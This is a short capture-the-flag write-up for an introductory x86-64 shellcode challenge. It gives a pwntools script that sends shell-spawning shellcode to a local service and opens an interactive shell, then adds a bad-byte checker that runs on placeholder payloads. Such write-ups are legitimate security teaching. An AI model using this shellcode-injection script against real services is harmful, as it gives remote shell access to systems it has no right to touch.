Writeup by iv3l for Shellcode

intro pwn x86/x64

February 27, 2025

The binary seems to directly execute the machine code sent by the user.

Let’s write a basic pwntools script:

  1. Architecture Context: The context(arch='amd64') specifies that the shellcode should be generated for a 64-bit architecture.
  2. Generate Shellcode: asm(shellcraft.sh()) generates a simple shellcode that spawns a /bin/bash shell.
  3. Remote Connection: remote('127.0.0.1', 4000) establishes a connection to the target at localhost on port 4000.
  4. Clean the Input: proc.clean() clears any old data from the connection to make sure we send clean input.
  5. Send Shellcode: proc.sendline(shellcode) sends the shellcode to the remote service.
  6. Execute a Command: proc.sendline(b'uname -a') sends a command (uname -a) to the remote system to check the environment or confirm access.
  7. Interactive Mode: Finally, proc.interactive() switches to interactive mode, allowing you to interact with the shell once the payload is executed.
```python
#!/usr/bin/env python3
from pwn import *

# Set the architecture context to 64-bit so asm() emits x86-64 machine code
context(arch='amd64')

# Generate the shellcode to spawn a shell (shellcraft.sh() builds an execve stub)
shellcode = asm(shellcraft.sh())

# Connect to the remote service (localhost, port 4000)
proc = remote('127.0.0.1', 4000)

# Clean any previous data (banner, prompt) from the connection
proc.clean()

# Send the shellcode to the remote service; sendline() appends b'\n',
# so the payload itself must not contain a newline byte
print("[*] Sending shellcode to the remote service...")
proc.sendline(shellcode)

# Send an additional command to test the shell
print("[*] Sending 'uname -a' to check the system...")
proc.sendline(b'uname -a')

# Switch to interactive mode so we can interact with the shell
print("[*] Interactive shell opened...")
proc.interactive()
```
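Step 5 sends the raw machine code with sendline(), which only works if the payload itself contains no byte that the receiving side treats as a terminator: a line-oriented reader stops at the first 0x0a, and C string handling stops at the first NUL. The following pre-send check is an added example, not part of the original writeup or of pwntools; the sample payloads are constructed placeholders (a NOP sled ending in an int3 trap), not real shellcode, and the function names are my own.

```python
# Pre-send sanity check for a raw machine-code payload (added example,
# not from the original writeup). It reports any "forbidden" bytes that a
# line-based or NUL-terminated reader would cut the payload at, so the
# truncation is caught locally instead of showing up as a silent crash
# on the target.

# Bytes that commonly truncate a payload before it runs: newline (what
# sendline() itself appends, and what a line reader stops at) and NUL.
DEFAULT_FORBIDDEN = b"\n\x00"


def find_forbidden_bytes(payload: bytes, forbidden: bytes = DEFAULT_FORBIDDEN) -> dict:
    """Return {byte_value: [offsets]} for every forbidden byte in payload.

    An empty dict means the payload can be sent with sendline() intact.
    """
    hits = {}
    for offset, value in enumerate(payload):
        if value in forbidden:
            hits.setdefault(value, []).append(offset)
    return hits


def payload_is_line_safe(payload: bytes, forbidden: bytes = DEFAULT_FORBIDDEN) -> bool:
    """True when no forbidden byte occurs anywhere in the payload."""
    return not find_forbidden_bytes(payload, forbidden)


def describe_hits(hits: dict) -> str:
    """Human-readable summary of find_forbidden_bytes() output."""
    if not hits:
        return "payload contains no forbidden bytes"
    parts = [f"0x{value:02x} at offsets {offsets}" for value, offsets in sorted(hits.items())]
    return "forbidden bytes found: " + "; ".join(parts)


# Constructed sample payloads (placeholders, not shellcode):
# a NOP sled (0x90) ending in an int3 breakpoint (0xcc).
SAMPLE_CLEAN = b"\x90" * 8 + b"\xcc"
# Same sled with a newline and a NUL injected, which a line reader
# would truncate at offset 1 and a C string reader at offset 3.
SAMPLE_BROKEN = b"\x90\x0a\x90\x00\xcc"


if __name__ == "__main__":
    for name, sample in (("clean", SAMPLE_CLEAN), ("broken", SAMPLE_BROKEN)):
        print(f"[{name}] {describe_hits(find_forbidden_bytes(sample))}")
```

Run the check on the real payload before the `proc.sendline(shellcode)` step; if it reports hits, the shellcode needs to be regenerated without those bytes (or sent with a framing the service accepts) rather than sent as-is.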